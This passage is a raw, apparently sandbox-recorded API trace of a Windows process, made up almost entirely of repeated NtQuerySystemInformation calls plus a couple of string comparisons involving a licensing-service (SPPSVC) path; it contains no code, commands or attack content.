ResultLength=0x0) [0271.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x38, ResultLength=0x0) [0271.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x20, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x20, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x50, ResultLength=0x0) [0271.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdca0, Length=0x28, ResultLength=0x0) [0271.521] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x50, ResultLength=0x0) [0271.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x50, ResultLength=0x0) [0271.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x50, ResultLength=0x0) [0271.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0271.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0271.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0271.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0271.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaf0, Length=0x28, ResultLength=0x0) [0271.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0271.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x28, ResultLength=0x0) [0271.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x28, ResultLength=0x0) [0271.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0271.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x20, ResultLength=0x0) [0271.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x20, ResultLength=0x0) [0271.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x20, ResultLength=0x0) [0271.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x20, ResultLength=0x0) [0271.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0271.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x20, ResultLength=0x0) [0271.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x20, ResultLength=0x0) [0271.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x20, ResultLength=0x0) [0271.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x50, ResultLength=0x0) [0271.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdca0, Length=0x28, ResultLength=0x0) [0271.535] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x50, ResultLength=0x0) [0271.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x50, ResultLength=0x0) [0271.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x50, ResultLength=0x0) [0271.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0271.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0271.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0271.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0271.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaf0, Length=0x28, ResultLength=0x0) [0271.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0271.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x28, ResultLength=0x0) [0271.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x28, ResultLength=0x0) [0271.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0271.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x20, ResultLength=0x0) [0271.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x20, ResultLength=0x0) [0271.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x20, ResultLength=0x0) [0271.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x20, ResultLength=0x0) [0271.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0271.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x20, ResultLength=0x0) [0271.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x20, ResultLength=0x0) [0271.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x20, ResultLength=0x0) [0271.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x50, ResultLength=0x0) [0271.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x50, ResultLength=0x0) [0271.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x50, ResultLength=0x0) [0271.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfded0, Length=0x38, ResultLength=0x0) [0271.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde10, Length=0x28, ResultLength=0x0) [0271.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd28, Length=0x50, ResultLength=0x0) [0271.549] GetTickCount () returned 0x1184331 [0271.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbf8, Length=0x58, ResultLength=0x0) [0271.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x38, ResultLength=0x0) [0271.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x28, ResultLength=0x0) [0271.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x28, ResultLength=0x0) [0271.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x28, ResultLength=0x0) [0271.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd940, Length=0x28, ResultLength=0x0) [0271.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x28, ResultLength=0x0) [0271.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x38, ResultLength=0x0) [0271.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x28, ResultLength=0x0) [0271.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda30, Length=0x28, ResultLength=0x0) [0271.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x38, ResultLength=0x0) [0271.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x20, ResultLength=0x0) [0271.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0271.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0271.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0271.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x38, ResultLength=0x0) [0271.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd990, Length=0x20, ResultLength=0x0) [0271.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x20, ResultLength=0x0) [0271.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd920, Length=0x20, ResultLength=0x0) [0271.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbf8, Length=0x58, ResultLength=0x0) [0271.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x38, ResultLength=0x0) [0271.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0271.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0271.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0271.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0271.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd980, Length=0x28, ResultLength=0x0) [0271.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x38, ResultLength=0x0) [0271.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x38, ResultLength=0x0) [0271.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x28, ResultLength=0x0) [0271.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x28, ResultLength=0x0) [0271.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x38, ResultLength=0x0) [0271.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x38, ResultLength=0x0) [0271.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.572] 